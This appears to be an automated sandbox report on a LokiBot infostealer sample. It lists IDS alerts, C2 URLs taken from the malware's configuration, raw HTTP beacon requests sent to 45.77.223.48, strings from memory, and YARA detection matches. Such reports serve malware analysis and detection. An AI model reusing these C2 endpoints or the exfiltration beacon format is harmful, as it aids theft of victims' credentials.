                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49747 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49752 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49752 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49754 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49756 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49757 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49758 -> 45.77.223.48:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                      Source: Malware configuration extractorURLs: http://45.77.223.48/~blog/?ajax=a
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 176Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 176Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 149Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 13_2_00404ED4 recv,13_2_00404ED4
                      Source: unknownHTTP traffic detected: POST /~blog/?ajax=a HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8425B4CAContent-Length: 176Connection: close
                      Source: gunzipped.exe, 00000007.00000002.1965144690.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, gunzipped.exe, 00000007.00000002.1966713417.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.77.223.48/~blog/?ajax=a
                      Source: gunzipped.exe, 00000007.00000002.1967011464.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.77.223.48/~blog/index.php?rest_route=/
                      Source: gunzipped.exe, mPvIOxEZXJsdYp.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: gunzipped.exe, 00000000.00000002.1739814239.000000000798C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningC
                      Source: gunzipped.exe, mPvIOxEZXJsdYp.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: gunzipped.exe, 00000000.00000002.1739814239.000000000798C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.cRa
                      Source: gunzipped.exe, mPvIOxEZXJsdYp.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: gunzipped.exe, 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, mPvIOxEZXJsdYp.exe, 00000008.00000002.1763912656.0000000002F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: mPvIOxEZXJsdYp.exe, mPvIOxEZXJsdYp.exe, 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: gunzipped.exe, 00000007.00000002.1967011464.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                      Source: gunzipped.exe, mPvIOxEZXJsdYp.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: Process Memory Space: gunzipped.exe PID: 6640, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7368, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_0772FA30 NtUnmapViewOfSection,0_2_0772FA30
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_0772FA28 NtUnmapViewOfSection,0_2_0772FA28
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_00FAD2A40_2_00FAD2A4
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077223E00_2_077223E0
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_077220C80_2_077220C8
